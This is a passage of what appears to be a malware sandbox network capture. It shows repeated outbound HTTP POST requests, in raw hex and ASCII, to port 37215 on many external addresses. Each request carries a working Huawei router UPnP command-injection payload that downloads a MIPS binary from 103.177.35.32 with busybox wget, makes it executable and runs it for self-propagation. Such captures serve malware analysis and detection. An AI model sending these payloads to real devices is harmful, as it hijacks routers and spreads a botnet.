                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1865192.168.2.2333122213.104.48.13237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606717110 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1866192.168.2.233619836.204.253.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606719017 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1867192.168.2.2342572197.251.229.23437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606787920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1868192.168.2.2333948197.145.244.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606826067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1869192.168.2.2349652157.54.228.20937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607189894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1870192.168.2.2337598197.100.142.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607265949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1871192.168.2.2332954197.119.110.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607295036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1872192.168.2.2337856157.25.155.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607346058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1873192.168.2.233634641.117.9.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607398987 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1874192.168.2.235163241.170.123.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.607429981 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
